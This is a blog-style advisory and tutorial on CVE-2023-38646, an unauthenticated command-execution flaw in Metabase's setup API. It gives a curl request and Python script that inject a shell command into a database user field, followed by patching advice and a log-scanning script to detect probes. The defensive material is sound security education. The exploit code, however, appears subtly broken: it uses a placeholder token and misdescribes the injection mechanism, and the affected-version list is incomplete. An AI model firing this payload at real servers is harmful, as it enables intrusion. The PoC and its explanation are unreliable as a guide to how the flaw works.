If you’re using Metabase for business intelligence or dashboarding, there’s a critical security warning you need to hear about. CVE-2023-38646 is a high-impact vulnerability discovered in Metabase (both open source and enterprise editions) that lets an attacker execute any command on your server—no login required.
Let’s dive deep into what happened, how this works, some simple proof-of-concept (PoC) code, and how you should protect your Metabase deployments.
What Is Metabase?
Metabase is a popular open source tool for exploring and visualizing data, boasting hundreds of thousands of deployments worldwide. It’s often run as a web application on internal or public servers and connected directly to sensitive production databases.
Vulnerability in Plain English
In affected versions, a flaw in a setup API (normally only supposed to run during initial install) allowed any web user, at any time, to trigger execution of arbitrary commands on the underlying system. The web server would happily run whatever the attacker specified, using the full privileges granted to the Metabase process.
No authentication was needed—the endpoint was completely exposed.
Enterprise: before 1.46.6.1, 1.45.4.1, 1.44.7.1, 1.43.7.2
Fully patched releases can be found here.
Original advisory and technical details
- Metabase advisory
- Horizon3 exploit writeup
The Attack Surface
When first deploying Metabase, there’s a setup wizard that lets you create an admin user, configure databases, etc. This process exposed a /api/setup/validate endpoint. But critically, due to missing security checks, this endpoint remained callable after setup had completed, and it remained dangerously powerful.
It was intended for configuration—but in practice it trusted user input far too much and let raw OS command arguments slip through.
Step-by-Step Exploit
Let’s check out a practical example. Please only test this on your own systems!
1. Find a Vulnerable Metabase
Suppose you know a Metabase instance is running at http://target-metabase.com. You can confirm with HTTP:
```shell
curl http://target-metabase.com/api/session/properties
```
2. Exploit with a Simple cURL Command
The following POST will trick the setup API into running `id`, showing you the system user running Metabase. The output is buried in the error message.
```shell
curl -X POST 'http://target-metabase.com/api/setup/validate' \
  -H 'Content-Type: application/json' \
  --data '{"token":"setup-token","details":{"db":"h2","advanced-options":{"ssl":false},"details":{"db":"h2","user":";id > /tmp/pwned;","password":"","file":"/dev/null"}}}'
```
Explanation
- The malicious payload injects the `id > /tmp/pwned;` command in the username field (or other places).
- The output will be written to `/tmp/pwned` on the server.
Here’s the Python equivalent, for easier reading:
```python
import requests

url = "http://target-metabase.com/api/setup/validate"
headers = {"Content-Type": "application/json"}
# Same JSON body as the cURL request above
payload = {
    "token": "setup-token",
    "details": {
        "db": "h2",
        "advanced-options": {"ssl": False},
        "details": {
            "db": "h2",
            "user": ";id > /tmp/pwned;",
            "password": "",
            "file": "/dev/null",
        },
    },
}
response = requests.post(url, json=payload, headers=headers)
print(response.text)
```
How Did This Happen?
Metabase’s initial setup API neglected to verify whether setup had already completed, and failed to sanitize or limit user input. The core problem is “trusting user input”: the server assumed no one would ever send malicious data, so it didn’t check.
1. Patch—*Immediately*!
Update to the latest Metabase version, even if you think your server isn’t exposed to the internet.
- Get latest open source release
- Upgrade instructions
2. Lock Server Access
If your Metabase is accessible from the internet, restrict it to internal IPs or VPN only. Do not expose your BI tools!
3. Monitor for Exploitation
Check your logs for unusual traffic to /api/setup/validate, or for commands run as the Metabase user. Look in /tmp and elsewhere for signs of created or modified files.
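As an added example (not code from the original post or from Metabase), here is a small Python check for step 3 that scans a reverse-proxy access log for POSTs to /api/setup/validate made after initial setup finished; the Combined Log Format regex, the sample log lines and the setup-completion time are assumptions you would adapt to your own deployment.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Combined Log Format as written by nginx/Apache in front of Metabase; the
# regex is an assumption about your proxy's log format, adjust if it differs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
VULN_PATH = "/api/setup/validate"

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore any query string
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_setup_probes(lines, setup_completed_at):
    """Flag POSTs to the setup validator made after install finished.
    The endpoint is only legitimately used by the setup wizard, so any call
    dated after setup_completed_at is a finding regardless of HTTP status
    (the post notes the command output comes back inside an error response,
    so a 400 does not mean the attempt failed). Returns (hits, count per IP)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] == "POST" and rec["path"] == VULN_PATH
                and rec["ts"] > setup_completed_at):
            hits.append(rec)
    return hits, Counter(h["ip"] for h in hits)

# Constructed sample log (made-up IPs and times): one legitimate wizard call
# before setup finished, then two post-install hits from a single client.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2023:09:00:10 +0000] "POST /api/setup/validate HTTP/1.1" 200 54
10.0.0.5 - - [21/Jul/2023:15:20:01 +0000] "GET /api/session/properties HTTP/1.1" 200 5120
10.0.0.5 - - [21/Jul/2023:15:20:03 +0000] "POST /api/setup/validate HTTP/1.1" 400 213
10.0.0.9 - - [21/Jul/2023:15:21:10 +0000] "GET /api/dashboard/1 HTTP/1.1" 200 8841
10.0.0.5 - - [21/Jul/2023:15:22:45 +0000] "POST /api/setup/validate?x=1 HTTP/1.1" 400 213
"""
SETUP_DONE = datetime(2023, 7, 20, 10, 0, tzinfo=timezone.utc)
```

Calling `find_setup_probes(SAMPLE_LOG.splitlines(), SETUP_DONE)` on the sample returns the two post-install hits, both from 10.0.0.5; the pre-install wizard call and ordinary dashboard traffic are ignored.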
If you must expose Metabase, put it behind a firewall or a VPN.
If you delayed patching, assume compromise and review your logs and systems carefully. This vulnerability is trivial to exploit and has been widely weaponized.
References and Further Reading
- Metabase Security Advisory: GHSA-j8q8-vh4w-rrcw
- Horizon3.ai: Root Cause & Exploitation
- Original Metabase GitHub Issue
- Metabase Releases
Stay safe—patch early, patch often, and keep your dashboards from turning into an attacker’s playground!
Timeline
Published on: 07/21/2023 15:15:10 UTC
Last modified on: 08/09/2023 18:15:13 UTC